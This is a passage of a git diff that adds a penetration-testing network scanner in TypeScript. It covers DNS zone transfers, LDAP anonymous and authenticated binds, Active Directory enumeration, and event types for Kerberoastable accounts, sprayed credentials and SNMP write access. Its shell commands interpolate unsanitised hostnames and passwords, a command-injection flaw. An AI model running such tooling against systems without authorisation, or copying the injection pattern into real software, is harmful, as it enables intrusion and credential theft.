+  records: NetScanTypes.DNSRecord[]
+  subdomains: string[]
+  findings: string[]
+}
+
+/**
+ * DNS zone namespace.
+ */
+export namespace DNSZone {
+  /**
+   * Attempt zone transfer on a domain.
+   */
+  export async function attemptTransfer(
+    domain: string,
+    options: ZoneTransferOptions = {}
+  ): Promise<ZoneTransferResult> {
+    const timeout = options.timeout || 30000
+    let nameserver = options.nameserver
+
+    const result: ZoneTransferResult = {
+      domain,
+      nameserver: nameserver || "",
+      success: false,
+      records: [],
+      subdomains: [],
+      findings: [],
+    }
+
+    log.info("Attempting zone transfer", { domain, nameserver })
+
+    // Get nameservers if not provided
+    if (!nameserver) {
+      try {
+        const nameservers = await getNameservers(domain, timeout)
+        if (nameservers.length > 0) {
+          nameserver = nameservers[0]
+          result.nameserver = nameserver
+        }
+      } catch (err) {
+        log.debug("Failed to get nameservers", { domain, error: String(err) })
+      }
+    }
+
+    if (!nameserver) {
+      result.findings.push("Could not determine nameserver for domain")
+      return result
+    }
+
+    // Try zone transfer
+    try {
+      const records = await performAXFR(domain, nameserver, timeout)
+      if (records.length > 0) {
+        result.success = true
+        result.records = records
+        result.subdomains = extractSubdomains(records, domain)
+        result.findings.push(
+          `Zone transfer successful! Retrieved ${records.length} records and ${result.subdomains.length} subdomains`
+        )
+      }
+    } catch (err) {
+      log.debug("Zone transfer failed", { domain, nameserver, error: String(err) })
+      result.findings.push(`Zone transfer denied by ${nameserver}`)
+    }
+
+    // Try with all nameservers if first failed
+    if (!result.success && !options.nameserver) {
+      try {
+        const nameservers = await getNameservers(domain, timeout)
+        for (const ns of nameservers.slice(1)) {
+          try {
+            const records = await performAXFR(domain, ns, timeout)
+            if (records.length > 0) {
+              result.success = true
+              result.nameserver = ns
+              result.records = records
+              result.subdomains = extractSubdomains(records, domain)
+              result.findings.push(
+                `Zone transfer successful on ${ns}! Retrieved ${records.length} records`
+              )
+              break
+            }
+          } catch {
+            // Try next nameserver
+          }
+        }
+      } catch {
+        // Nameserver lookup failed
+      }
+    }
+
+    log.info("Zone transfer attempt complete", {
+      domain,
+      success: result.success,
+      recordCount: result.records.length,
+    })
+
+    return result
+  }
+
+  /**
+   * Get nameservers for a domain.
+   */
+  export async function getNameservers(domain: string, timeout: number = 10000): Promise<string[]> {
+    const { stdout } = await execAsync(
+      `dig NS ${domain} +short 2>/dev/null || host -t NS ${domain} 2>/dev/null`,
+      { timeout }
+    )
+
+    const nameservers: string[] = []
+    const lines = stdout.split("\n")
+
+    for (const line of lines) {
+      // dig format: ns1.example.com.
+      // host format: example.com name server ns1.example.com.
+      const nsMatch = line.match(/(?:name server\s+)?(\S+\.)+/i)
+      if (nsMatch) {
+        const ns = nsMatch[0].replace(/\.$/, "").trim()
+        if (ns && !nameservers.includes(ns)) {
+          nameservers.push(ns)
+        }
+      }
+    }
+
+    return nameservers
+  }
+
+  /**
+   * Perform AXFR zone transfer.
+   */
+  async function performAXFR(
+    domain: string,
+    nameserver: string,
+    timeout: number
+  ): Promise<NetScanTypes.DNSRecord[]> {
+    const { stdout, stderr } = await execAsync(
+      `dig @${nameserver} ${domain} AXFR +noall +answer 2>&1`,
+      { timeout }
+    )
+
+    const output = stdout + stderr
+
+    // Check for transfer failure
+    if (
+      output.includes("Transfer failed") ||
+      output.includes("REFUSED") ||
+      output.includes("connection timed out") ||
+      output.includes("SERVFAIL")
+    ) {
+      throw new Error("Zone transfer refused")
+    }
+
+    return parseDigOutput(output, domain)
+  }
+
+  /**
+   * Parse dig output into DNS records.
+   */
+  function parseDigOutput(output: string, domain: string): NetScanTypes.DNSRecord[] {
+    const records: NetScanTypes.DNSRecord[] = []
+    const lines = output.split("\n")
+
+    for (const line of lines) {
+      // Skip comments and empty lines
+      if (!line.trim() || line.startsWith(";")) {
+        continue
+      }
+
+      // Parse record: name TTL class type value
+      const parts = line.split(/\s+/)
+      if (parts.length < 5) continue
+
+      const name = parts[0].replace(/\.$/, "")
+      const ttl = parseInt(parts[1], 10)
+      const recordClass = parts[2]
+      const type = parts[3]
+      const value = parts.slice(4).join(" ").replace(/\.$/, "")
+
+      if (recordClass !== "IN") continue
+
+      const validTypes = ["A", "AAAA", "CNAME", "MX", "NS", "PTR", "SOA", "SRV", "TXT"]
+      if (validTypes.includes(type)) {
+        records.push({
+          name,
+          type: type as NetScanTypes.DNSRecord["type"],
+          value,
+          ttl,
+        })
+      }
+    }
+
+    return records
+  }
+
+  /**
+   * Extract subdomains from DNS records.
+   */
+  function extractSubdomains(records: NetScanTypes.DNSRecord[], domain: string): string[] {
+    const subdomains = new Set<string>()
+    const domainLower = domain.toLowerCase()
+
+    for (const record of records) {
+      const nameLower = record.name.toLowerCase()
+
+      if (nameLower.endsWith(domainLower) && nameLower !== domainLower) {
+        const subdomain = nameLower.slice(0, -(domainLower.length + 1))
+        if (subdomain && !subdomain.includes("_")) {
+          subdomains.add(subdomain)
+        }
+      }
+    }
+
+    return Array.from(subdomains).sort()
+  }
+
+  /**
+   * Get zone information from records.
+   */
+  export function getZoneInfo(records: NetScanTypes.DNSRecord[]): {
+    soaRecord?: NetScanTypes.DNSRecord
+    nameservers: string[]
+    mailServers: string[]
+    hosts: Map<string, string[]>
+  } {
+    const result = {
+      soaRecord: undefined as NetScanTypes.DNSRecord | undefined,
+      nameservers: [] as string[],
+      mailServers: [] as string[],
+      hosts: new Map<string, string[]>(),
+    }
+
+    for (const record of records) {
+      switch (record.type) {
+        case "SOA":
+          result.soaRecord = record
+          break
+        case "NS":
+          result.nameservers.push(record.value)
+          break
+        case "MX":
+          result.mailServers.push(record.value)
+          break
+        case "A":
+        case "AAAA":
+          const existing = result.hosts.get(record.name) || []
+          existing.push(record.value)
+          result.hosts.set(record.name, existing)
+          break
+      }
+    }
+
+    return result
+  }
+
+  /**
+   * Convert zone transfer result to DNSZone type.
+   */
+  export function toZoneType(result: ZoneTransferResult): NetScanTypes.DNSZone {
+    const zoneInfo = getZoneInfo(result.records)
+
+    return {
+      domain: result.domain,
+      nameservers: zoneInfo.nameservers,
+      transferAllowed: result.success,
+      records: result.records,
+      subdomains: result.subdomains,
+    }
+  }
+
+  /**
+   * Format zone transfer results for display.
+   */
+  export function formatResults(result: ZoneTransferResult): string {
+    const lines: string[] = []
+
+    lines.push(`Zone Transfer Results for ${result.domain}`)
+    lines.push(`Nameserver: ${result.nameserver}`)
+    lines.push(`Status: ${result.success ? "SUCCESS" : "FAILED"}`)
+    lines.push("")
+
+    if (result.success) {
+      lines.push(`Records: ${result.records.length}`)
+      lines.push(`Subdomains: ${result.subdomains.length}`)
+      lines.push("")
+
+      // Group by record type
+      const byType = new Map<string, NetScanTypes.DNSRecord[]>()
+      for (const record of result.records) {
+        const existing = byType.get(record.type) || []
+        existing.push(record)
+        byType.set(record.type, existing)
+      }
+
+      for (const [type, records] of byType) {
+        lines.push(`${type} Records (${records.length}):`)
+        for (const record of records.slice(0, 10)) {
+          lines.push(`  ${record.name} -> ${record.value}`)
+        }
+        if (records.length > 10) {
+          lines.push(`  ... and ${records.length - 10} more`)
+        }
+        lines.push("")
+      }
+    }
+
+    for (const finding of result.findings) {
+      lines.push(`[!] ${finding}`)
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/netscan/events.ts b/packages/opencode/src/pentest/netscan/events.ts
new file mode 100644
index 00000000000..f9845a2f9df
--- /dev/null
+++ b/packages/opencode/src/pentest/netscan/events.ts
@@ -0,0 +1,328 @@
+/**
+ * @fileoverview Network Scanner Events
+ *
+ * Bus event definitions for network infrastructure scanning operations.
+ *
+ * @module pentest/netscan/events
+ */
+
+import z from "zod"
+import { BusEvent } from "../../bus/bus-event"
+
+/**
+ * Network scanner events namespace.
+ */
+export namespace NetScanEvents {
+  /**
+   * Network scan started.
+   */
+  export const ScanStarted = BusEvent.define(
+    "pentest.netscan.scan_started",
+    z.object({
+      scanID: z.string(),
+      target: z.string(),
+      profile: z.string(),
+      modules: z.array(z.string()),
+    })
+  )
+
+  /**
+   * Host discovered during network scan.
+   */
+  export const HostDiscovered = BusEvent.define(
+    "pentest.netscan.host_discovered",
+    z.object({
+      scanID: z.string(),
+      ip: z.string(),
+      hostname: z.string().optional(),
+      os: z.string().optional(),
+    })
+  )
+
+  /**
+   * Network service discovered on a host.
+   */
+  export const ServiceDiscovered = BusEvent.define(
+    "pentest.netscan.service_discovered",
+    z.object({
+      scanID: z.string(),
+      host: z.string(),
+      port: z.number(),
+      protocol: z.enum(["tcp", "udp"]),
+      service: z.string(),
+      version: z.string().optional(),
+    })
+  )
+
+  /**
+   * Active Directory domain discovered.
+   */
+  export const ADDomainFound = BusEvent.define(
+    "pentest.netscan.ad_domain_found",
+    z.object({
+      scanID: z.string(),
+      domainName: z.string(),
+      netbios: z.string().optional(),
+      domainSID: z.string().optional(),
+      functionalLevel: z.string().optional(),
+      dcCount: z.number(),
+    })
+  )
+
+  /**
+   * AD user enumerated.
+   */
+  export const UserEnumerated = BusEvent.define(
+    "pentest.netscan.user_enumerated",
+    z.object({
+      scanID: z.string(),
+      domain: z.string(),
+      samAccountName: z.string(),
+      enabled: z.boolean(),
+      adminCount: z.boolean(),
+      spnCount: z.number(),
+    })
+  )
+
+  /**
+   * AD group enumerated.
+   */
+  export const GroupEnumerated = BusEvent.define(
+    "pentest.netscan.group_enumerated",
+    z.object({
+      scanID: z.string(),
+      domain: z.string(),
+      groupName: z.string(),
+      memberCount: z.number(),
+      isPrivileged: z.boolean(),
+    })
+  )
+
+  /**
+   * SMB share discovered.
+   */
+  export const ShareFound = BusEvent.define(
+    "pentest.netscan.share_found",
+    z.object({
+      scanID: z.string(),
+      host: z.string(),
+      shareName: z.string(),
+      shareType: z.string(),
+      readable: z.boolean(),
+      writable: z.boolean(),
+      anonymous: z.boolean(),
+    })
+  )
+
+  /**
+   * SMB null session detected.
+   */
+  export const NullSessionFound = BusEvent.define(
+    "pentest.netscan.null_session_found",
+    z.object({
+      scanID: z.string(),
+      host: z.string(),
+      sharesAccessible: z.number(),
+      usersEnumerable: z.boolean(),
+    })
+  )
+
+  /**
+   * SNMP community string found.
+   */
+  export const SNMPCommunityFound = BusEvent.define(
+    "pentest.netscan.snmp_community_found",
+    z.object({
+      scanID: z.string(),
+      host: z.string(),
+      community: z.string(),
+      version: z.enum(["v1", "v2c", "v3"]),
+      writeAccess: z.boolean(),
+    })
+  )
+
+  /**
+   * DNS zone transfer successful.
+   */
+  export const ZoneTransferSuccess = BusEvent.define(
+    "pentest.netscan.zone_transfer_success",
+    z.object({
+      scanID: z.string(),
+      domain: z.string(),
+      nameserver: z.string(),
+      recordCount: z.number(),
+    })
+  )
+
+  /**
+   * Subdomain discovered during DNS enumeration.
+   */
+  export const SubdomainFound = BusEvent.define(
+    "pentest.netscan.subdomain_found",
+    z.object({
+      scanID: z.string(),
+      domain: z.string(),
+      subdomain: z.string(),
+      ip: z.string().optional(),
+    })
+  )
+
+  /**
+   * LDAP anonymous bind successful.
+   */
+  export const LDAPAnonBindSuccess = BusEvent.define(
+    "pentest.netscan.ldap_anon_bind_success",
+    z.object({
+      scanID: z.string(),
+      host: z.string(),
+      baseDN: z.string(),
+      objectsEnumerable: z.number(),
+    })
+  )
+
+  /**
+   * Kerberoastable account found.
+   */
+  export const KerberoastableFound = BusEvent.define(
+    "pentest.netscan.kerberoastable_found",
+    z.object({
+      scanID: z.string(),
+      domain: z.string(),
+      samAccountName: z.string(),
+      spnCount: z.number(),
+      isAdmin: z.boolean(),
+    })
+  )
+
+  /**
+   * AS-REP roastable account found.
+   */
+  export const ASRepRoastableFound = BusEvent.define(
+    "pentest.netscan.asrep_roastable_found",
+    z.object({
+      scanID: z.string(),
+      domain: z.string(),
+      samAccountName: z.string(),
+      isAdmin: z.boolean(),
+    })
+  )
+
+  /**
+   * Valid credential found.
+   */
+  export const CredentialFound = BusEvent.define(
+    "pentest.netscan.credential_found",
+    z.object({
+      scanID: z.string(),
+      host: z.string(),
+      service: z.string(),
+      port: z.number(),
+      username: z.string(),
+      method: z.enum(["default", "spray", "brute"]),
+      isAdmin: z.boolean(),
+    })
+  )
+
+  /**
+   * Vulnerability detected.
+   */
+  export const VulnerabilityFound = BusEvent.define(
+    "pentest.netscan.vulnerability_found",
+    z.object({
+      scanID: z.string(),
+      host: z.string(),
+      vulnerability: z.string(),
+      severity: z.enum(["critical", "high", "medium", "low", "info"]),
+      cve: z.string().optional(),
+      service: z.string().optional(),
+    })
+  )
+
+  /**
+   * SMB signing status detected.
+   */
+  export const SMBSigningStatus = BusEvent.define(
+    "pentest.netscan.smb_signing_status",
+    z.object({
+      scanID: z.string(),
+      host: z.string(),
+      required: z.boolean(),
+      enabled: z.boolean(),
+    })
+  )
+
+  /**
+   * Password policy extracted.
+   */
+  export const PasswordPolicyFound = BusEvent.define(
+    "pentest.netscan.password_policy_found",
+    z.object({
+      scanID: z.string(),
+      domain: z.string(),
+      minLength: z.number(),
+      maxAge: z.number(),
+      complexity: z.boolean(),
+      lockoutThreshold: z.number(),
+    })
+  )
+
+  /**
+   * Domain trust discovered.
+   */
+  export const DomainTrustFound = BusEvent.define(
+    "pentest.netscan.domain_trust_found",
+    z.object({
+      scanID: z.string(),
+      sourceDomain: z.string(),
+      targetDomain: z.string(),
+      trustType: z.string(),
+      trustDirection: z.string(),
+      sidFiltering: z.boolean(),
+    })
+  )
+
+  /**
+   * Scan progress update.
+   */
+  export const ScanProgress = BusEvent.define(
+    "pentest.netscan.scan_progress",
+    z.object({
+      scanID: z.string(),
+      module: z.string(),
+      hostsScanned: z.number(),
+      totalHosts: z.number(),
+      percentComplete: z.number(),
+    })
+  )
+
+  /**
+   * Scan completed successfully.
+   */
+  export const ScanCompleted = BusEvent.define(
+    "pentest.netscan.scan_completed",
+    z.object({
+      scanID: z.string(),
+      target: z.string(),
+      profile: z.string(),
+      hostsDiscovered: z.number(),
+      servicesDiscovered: z.number(),
+      findingsCount: z.number(),
+      credentialsFound: z.number(),
+      duration: z.number(),
+      status: z.enum(["completed", "stopped", "partial"]),
+    })
+  )
+
+  /**
+   * Scan failed.
+   */
+  export const ScanFailed = BusEvent.define(
+    "pentest.netscan.scan_failed",
+    z.object({
+      scanID: z.string(),
+      target: z.string(),
+      error: z.string(),
+      module: z.string().optional(),
+    })
+  )
+}
diff --git a/packages/opencode/src/pentest/netscan/index.ts b/packages/opencode/src/pentest/netscan/index.ts
new file mode 100644
index 00000000000..5a9d5756678
--- /dev/null
+++ b/packages/opencode/src/pentest/netscan/index.ts
@@ -0,0 +1,110 @@
+/**
+ * @fileoverview Network Scanner Module
+ *
+ * Network infrastructure security testing capabilities including
+ * Active Directory, SMB, SNMP, DNS, and LDAP testing.
+ *
+ * @module pentest/netscan
+ */
+
+// Core exports
+export { NetScanTypes } from "./types"
+export { NetScanEvents } from "./events"
+export { NetScanStorage } from "./storage"
+export type { StorageConfig } from "./storage"
+export { NetScanProfiles } from "./profiles"
+export { NetScanOrchestrator } from "./orchestrator"
+export type { OrchestratorOptions } from "./orchestrator"
+export { NetScanTool } from "./tool"
+
+// SMB exports
+export { SMBShares, SMBSessions, SMBSigning, SMBVulns } from "./smb"
+export type {
+  SMBAuth,
+  ShareEnumOptions,
+  NullSessionResult,
+  SessionTestOptions,
+  SMBSigningStatus,
+  SigningCheckOptions,
+  SMBVulnerability,
+  SMBVulnResult,
+  VulnCheckOptions,
+} from "./smb"
+
+// DNS exports
+export { DNSZone, DNSEnum, DNSCache } from "./dns"
+export type {
+  ZoneTransferOptions,
+  ZoneTransferResult,
+  SubdomainEnumOptions,
+  DiscoveredSubdomain,
+  SubdomainEnumResult,
+  CachePoisonOptions,
+  CachePoisonVuln,
+  CachePoisonResult,
+} from "./dns"
+
+// SNMP exports
+export { SNMPCommunity, SNMPWalk, SNMPWrite } from "./snmp"
+export type {
+  CommunityTestOptions,
+  CommunityTestResult,
+  CommunityBruteOptions,
+  CommunityBruteResult,
+  SNMPWalkOptions,
+  SNMPEntry,
+  SNMPWalkResult,
+  WriteTestOptions,
+  WritableOID,
+  WriteTestResult,
+} from "./snmp"
+
+// LDAP exports
+export { LDAPBind, LDAPEnum, LDAPPolicy } from "./ldap"
+export type {
+  LDAPBindOptions,
+  LDAPAuth,
+  LDAPBindResult,
+  AuthBindResult,
+  LDAPEnumOptions,
+  LDAPEnumResult,
+  PolicyOptions,
+  PolicyResult,
+  FineGrainedPolicy,
+  PolicyWeakness,
+} from "./ldap"
+
+// AD exports
+export { ADEnumeration, Kerberos, DomainTrusts } from "./ad"
+export type {
+  ADEnumOptions,
+  ADEnumResult,
+  KerberosOptions,
+  KerberoastTarget,
+  ASRepTarget,
+  KerberosResult,
+  TrustEnumOptions,
+  TrustEnumResult,
+} from "./ad"
+
+// Credential exports
+export { DefaultCreds, PasswordSpray, DEFAULT_CREDENTIALS } from "./creds"
+export type {
+  DefaultCredential,
+  DefaultTestOptions,
+  SprayOptions,
+  SprayTarget,
+  SprayResult,
+} from "./creds"
+
+// Parser exports
+export { CrackMapExecParser, Enum4linuxParser, LdapsearchParser } from "./parsers"
+export type {
+  CMELine,
+  CMEResults,
+  Enum4linuxResults,
+  Enum4linuxUser,
+  Enum4linuxGroup,
+  LDAPEntry,
+  LdapsearchResults,
+} from "./parsers"
diff --git a/packages/opencode/src/pentest/netscan/ldap/bind.ts b/packages/opencode/src/pentest/netscan/ldap/bind.ts
new file mode 100644
index 00000000000..f4ebedc804c
--- /dev/null
+++ b/packages/opencode/src/pentest/netscan/ldap/bind.ts
@@ -0,0 +1,371 @@
+/**
+ * @fileoverview LDAP Bind Testing
+ *
+ * Test anonymous and authenticated LDAP binds.
+ *
+ * @module pentest/netscan/ldap/bind
+ */
+
+import { exec } from "child_process"
+import { promisify } from "util"
+import { Log } from "../../../util/log"
+
+const execAsync = promisify(exec)
+const log = Log.create({ service: "netscan.ldap.bind" })
+
+/**
+ * LDAP bind options.
+ */
+export interface LDAPBindOptions {
+  port?: number
+  ssl?: boolean
+  timeout?: number
+  baseDN?: string
+}
+
+/**
+ * LDAP authentication.
+ */
+export interface LDAPAuth {
+  username: string
+  password: string
+  domain?: string
+}
+
+/**
+ * LDAP bind result.
+ */
+export interface LDAPBindResult {
+  host: string
+  port: number
+  ssl: boolean
+  anonymousAllowed: boolean
+  baseDN?: string
+  namingContexts: string[]
+  serverInfo: {
+    vendorName?: string
+    vendorVersion?: string
+    supportedLDAPVersion: number[]
+    supportedSASLMechanisms: string[]
+    supportedControls: string[]
+  }
+  findings: string[]
+}
+
+/**
+ * Authentication bind result.
+ */
+export interface AuthBindResult {
+  host: string
+  success: boolean
+  username: string
+  isAdmin: boolean
+  userDN?: string
+  groups: string[]
+  findings: string[]
+}
+
+/**
+ * LDAP bind namespace.
+ */
+export namespace LDAPBind {
+  /**
+   * Test anonymous LDAP bind.
+   */
+  export async function testAnonymous(
+    host: string,
+    options: LDAPBindOptions = {}
+  ): Promise<LDAPBindResult> {
+    const port = options.port || (options.ssl ? 636 : 389)
+    const ssl = options.ssl || port === 636
+    const timeout = options.timeout || 30000
+
+    const result: LDAPBindResult = {
+      host,
+      port,
+      ssl,
+      anonymousAllowed: false,
+      namingContexts: [],
+      serverInfo: {
+        supportedLDAPVersion: [],
+        supportedSASLMechanisms: [],
+        supportedControls: [],
+      },
+      findings: [],
+    }
+
+    log.info("Testing anonymous LDAP bind", { host, port, ssl })
+
+    try {
+      // Try to query root DSE anonymously
+      const ldapUrl = ssl ? `ldaps://${host}:${port}` : `ldap://${host}:${port}`
+      const { stdout, stderr } = await execAsync(
+        `ldapsearch -x -H '${ldapUrl}' -b '' -s base '(objectClass=*)' namingContexts supportedLDAPVersion supportedSASLMechanisms vendorName vendorVersion 2>&1`,
+        { timeout }
+      )
+
+      const output = stdout + stderr
+
+      if (!output.includes("Can't contact LDAP server") && !output.includes("Invalid credentials")) {
+        result.anonymousAllowed = true
+        result.findings.push("Anonymous LDAP bind is allowed")
+
+        // Parse naming contexts
+        const ncMatches = output.matchAll(/namingContexts:\s*(.+)/gi)
+        for (const match of ncMatches) {
+          result.namingContexts.push(match[1].trim())
+        }
+
+        if (result.namingContexts.length > 0) {
+          result.baseDN = result.namingContexts[0]
+          result.findings.push(`Base DN: ${result.baseDN}`)
+        }
+
+        // Parse server info
+        const vendorNameMatch = output.match(/vendorName:\s*(.+)/i)
+        if (vendorNameMatch) {
+          result.serverInfo.vendorName = vendorNameMatch[1].trim()
+        }
+
+        const vendorVersionMatch = output.match(/vendorVersion:\s*(.+)/i)
+        if (vendorVersionMatch) {
+          result.serverInfo.vendorVersion = vendorVersionMatch[1].trim()
+        }
+
+        const ldapVersionMatches = output.matchAll(/supportedLDAPVersion:\s*(\d+)/gi)
+        for (const match of ldapVersionMatches) {
+          result.serverInfo.supportedLDAPVersion.push(parseInt(match[1], 10))
+        }
+
+        const saslMatches = output.matchAll(/supportedSASLMechanisms:\s*(.+)/gi)
+        for (const match of saslMatches) {
+          result.serverInfo.supportedSASLMechanisms.push(match[1].trim())
+        }
+      }
+    } catch (err) {
+      log.debug("Anonymous bind failed", { host, error: String(err) })
+    }
+
+    // If anonymous bind failed, try to at least detect LDAP service
+    if (!result.anonymousAllowed) {
+      try {
+        const ldapUrl = ssl ? `ldaps://${host}:${port}` : `ldap://${host}:${port}`
+        const { stdout, stderr } = await execAsync(
+          `ldapsearch -x -H '${ldapUrl}' -b '' -s base '(objectClass=*)' 2>&1`,
+          { timeout: 5000 }
+        )
+
+        const output = stdout + stderr
+
+        if (output.includes("Invalid credentials") || output.includes("authentication required")) {
+          result.findings.push("LDAP service detected but anonymous bind is denied")
+        } else if (output.includes("Can't contact LDAP server")) {
+          result.findings.push("Cannot contact LDAP server")
+        }
+      } catch {
+        result.findings.push("LDAP service detection failed")
+      }
+    }
+
+    log.info("Anonymous bind test complete", {
+      host,
+      anonymousAllowed: result.anonymousAllowed,
+    })
+
+    return result
+  }
+
+  /**
+   * Test authenticated LDAP bind.
+   */
+  export async function testAuthenticated(
+    host: string,
+    auth: LDAPAuth,
+    options: LDAPBindOptions = {}
+  ): Promise<AuthBindResult> {
+    const port = options.port || (options.ssl ? 636 : 389)
+    const ssl = options.ssl || port === 636
+    const timeout = options.timeout || 30000
+
+    const result: AuthBindResult = {
+      host,
+      success: false,
+      username: auth.username,
+      isAdmin: false,
+      groups: [],
+      findings: [],
+    }
+
+    log.info("Testing authenticated LDAP bind", { host, username: auth.username })
+
+    try {
+      const ldapUrl = ssl ? `ldaps://${host}:${port}` : `ldap://${host}:${port}`
+      const bindDN = auth.domain
+        ? `${auth.username}@${auth.domain}`
+        : auth.username
+
+      // Try simple bind
+      const { stdout, stderr } = await execAsync(
+        `ldapsearch -x -H '${ldapUrl}' -D '${bindDN}' -w '${auth.password}' -b '' -s base '(objectClass=*)' 2>&1`,
+        { timeout }
+      )
+
+      const output = stdout + stderr
+
+      if (!output.includes("Invalid credentials") && !output.includes("authentication failed")) {
+        result.success = true
+        result.findings.push(`Successfully authenticated as ${auth.username}`)
+
+        // Try to find user DN and groups
+        if (options.baseDN) {
+          try {
+            const userInfo = await getUserInfo(host, auth, options.baseDN, ssl, port, timeout)
+            result.userDN = userInfo.dn
+            result.groups = userInfo.groups
+            result.isAdmin = userInfo.isAdmin
+
+            if (result.isAdmin) {
+              result.findings.push("User is member of privileged groups (Domain Admins, etc.)")
+            }
+          } catch {
+            // User info lookup failed
+          }
+        }
+      } else {
+        result.findings.push("Authentication failed - invalid credentials")
+      }
+    } catch (err) {
+      log.debug("Authenticated bind failed", { host, error: String(err) })
+      result.findings.push(`Bind failed: ${String(err)}`)
+    }
+
+    log.info("Authenticated bind test complete", {
+      host,
+      success: result.success,
+      isAdmin: result.isAdmin,
+    })
+
+    return result
+  }
+
+  /**
+   * Get user information after successful bind.
+   */
+  async function getUserInfo(
+    host: string,
+    auth: LDAPAuth,
+    baseDN: string,
+    ssl: boolean,
+    port: number,
+    timeout: number
+  ): Promise<{ dn: string; groups: string[]; isAdmin: boolean }> {
+    const ldapUrl = ssl ? `ldaps://${host}:${port}` : `ldap://${host}:${port}`
+    const bindDN = auth.domain ? `${auth.username}@${auth.domain}` : auth.username
+
+    // Search for the user
+    const { stdout } = await execAsync(
+      `ldapsearch -x -H '${ldapUrl}' -D '${bindDN}' -w '${auth.password}' -b '${baseDN}' '(sAMAccountName=${auth.username})' dn memberOf 2>&1`,
+      { timeout }
+    )
+
+    const result = { dn: "", groups: [] as string[], isAdmin: false }
+
+    // Extract DN
+    const dnMatch = stdout.match(/^dn:\s*(.+)/m)
+    if (dnMatch) {
+      result.dn = dnMatch[1].trim()
+    }
+
+    // Extract groups
+    const groupMatches = stdout.matchAll(/memberOf:\s*(.+)/gi)
+    for (const match of groupMatches) {
+      result.groups.push(match[1].trim())
+    }
+
+    // Check for admin groups
+    const adminGroups = [
+      "domain admins",
+      "enterprise admins",
+      "schema admins",
+      "administrators",
+      "account operators",
+    ]
+
+    for (const group of result.groups) {
+      const groupLower = group.toLowerCase()
+      if (adminGroups.some((ag) => groupLower.includes(ag))) {
+        result.isAdmin = true
+        break
+      }
+    }
+
+    return result
+  }
+
+  /**
+   * Detect LDAP service.
+   */
+  export async function detectService(
+    host: string,
+    options: LDAPBindOptions = {}
+  ): Promise<{ available: boolean; ssl: boolean; port: number }> {
+    // Try standard LDAP first
+    const ldapResult = await testAnonymous(host, { ...options, ssl: false, port: 389 })
+    if (ldapResult.anonymousAllowed || ldapResult.findings.some((f) => f.includes("LDAP service detected"))) {
+      return { available: true, ssl: false, port: 389 }
+    }
+
+    // Try LDAPS
+    const ldapsResult = await testAnonymous(host, { ...options, ssl: true, port: 636 })
+    if (ldapsResult.anonymousAllowed || ldapsResult.findings.some((f) => f.includes("LDAP service detected"))) {
+      return { available: true, ssl: true, port: 636 }
+    }
+
+    return { available: false, ssl: false, port: 389 }
+  }
+
+  /**
+   * Format bind results for display.
+   */
+  export function formatResults(result: LDAPBindResult): string {
+    const lines: string[] = []
+
+    lines.push(`LDAP Bind Test: ${result.host}:${result.port}`)
+    lines.push(`SSL: ${result.ssl ? "Yes" : "No"}`)
+    lines.push(`Anonymous Bind: ${result.anonymousAllowed ? "Allowed (VULNERABLE)" : "Denied"}`)
+    lines.push("")
+
+    if (result.baseDN) {
+      lines.push(`Base DN: ${result.baseDN}`)
+    }
+
+    if (result.namingContexts.length > 0) {
+      lines.push("Naming Contexts:")
+      for (const nc of result.namingContexts) {
+        lines.push(`  - ${nc}`)
+      }
+    }
+
+    if (result.serverInfo.vendorName) {
+      lines.push("")
+      lines.push("Server Information:")
+      lines.push(`  Vendor: ${result.serverInfo.vendorName}`)
+      if (result.serverInfo.vendorVersion) {
+        lines.push(`  Version: ${result.serverInfo.vendorVersion}`)
+      }
+      if (result.serverInfo.supportedLDAPVersion.length > 0) {
+        lines.push(`  LDAP Versions: ${result.serverInfo.supportedLDAPVersion.join(", ")}`)
+      }
+      if (result.serverInfo.supportedSASLMechanisms.length > 0) {
+        lines.push(`  SASL Mechanisms: ${result.serverInfo.supportedSASLMechanisms.join(", ")}`)
+      }
+    }
+
+    lines.push("")
+    for (const finding of result.findings) {
+      lines.push(`[!] ${finding}`)
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/netscan/ldap/enum.ts b/packages/opencode/src/pentest/netscan/ldap/enum.ts
new file mode 100644
index 00000000000..0e8fc98a5fa
--- /dev/null
+++ b/packages/opencode/src/pentest/netscan/ldap/enum.ts
@@ -0,0 +1,403 @@
+/**
+ * @fileoverview LDAP Enumeration
+ *
+ * Enumerate users, groups, and other objects via LDAP.
+ *
+ * @module pentest/netscan/ldap/enum
+ */
+
+import { exec } from "child_process"
+import { promisify } from "util"
+import { NetScanTypes } from "../types"
+import { LdapsearchParser } from "../parsers/ldapsearch"
+import { Log } from "../../../util/log"
+
+const execAsync = promisify(exec)
+const log = Log.create({ service: "netscan.ldap.enum" })
+
+/**
+ * LDAP enumeration options.
+ */
+export interface LDAPEnumOptions {
+  port?: number
+  ssl?: boolean
+  timeout?: number
+  baseDN: string
+  auth?: {
+    username: string
+    password: string
+    domain?: string
+  }
+  pageSize?: number
+  maxResults?: number
+}
+
+/**
+ * LDAP enumeration result.
+ */
+export interface LDAPEnumResult {
+  host: string
+  baseDN: string
+  users: NetScanTypes.ADUser[]
+  groups: NetScanTypes.ADGroup[]
+  computers: NetScanTypes.ADComputer[]
+  domainInfo?: Partial<NetScanTypes.ADDomain>
+  findings: string[]
+}
+
+/**
+ * LDAP enumeration namespace.
+ */
+export namespace LDAPEnum {
+  /**
+   * Enumerate all objects.
+   */
+  export async function enumerate(
+    host: string,
+    options: LDAPEnumOptions
+  ): Promise<LDAPEnumResult> {
+    const port = options.port || (options.ssl ? 636 : 389)
+    const ssl = options.ssl || port === 636
+    const timeout = options.timeout || 120000
+
+    const result: LDAPEnumResult = {
+      host,
+      baseDN: options.baseDN,
+      users: [],
+      groups: [],
+      computers: [],
+      findings: [],
+    }
+
+    log.info("Starting LDAP enumeration", { host, baseDN: options.baseDN })
+
+    // Get domain info first
+    try {
+      result.domainInfo = await getDomainInfo(host, options)
+      if (result.domainInfo?.name) {
+        result.findings.push(`Domain: ${result.domainInfo.name}`)
+      }
+    } catch (err) {
+      log.debug("Failed to get domain info", { error: String(err) })
+    }
+
+    // Enumerate users
+    try {
+      result.users = await enumerateUsers(host, options)
+      result.findings.push(`Enumerated ${result.users.length} users`)
+
+      // Find interesting users
+      const kerberoastable = result.users.filter((u) => u.servicePrincipalNames.length > 0)
+      const asrepRoastable = result.users.filter((u) => u.dontRequirePreauth)
+      const admins = result.users.filter((u) => u.adminCount)
+
+      if (kerberoastable.length > 0) {
+        result.findings.push(`${kerberoastable.length} Kerberoastable users found`)
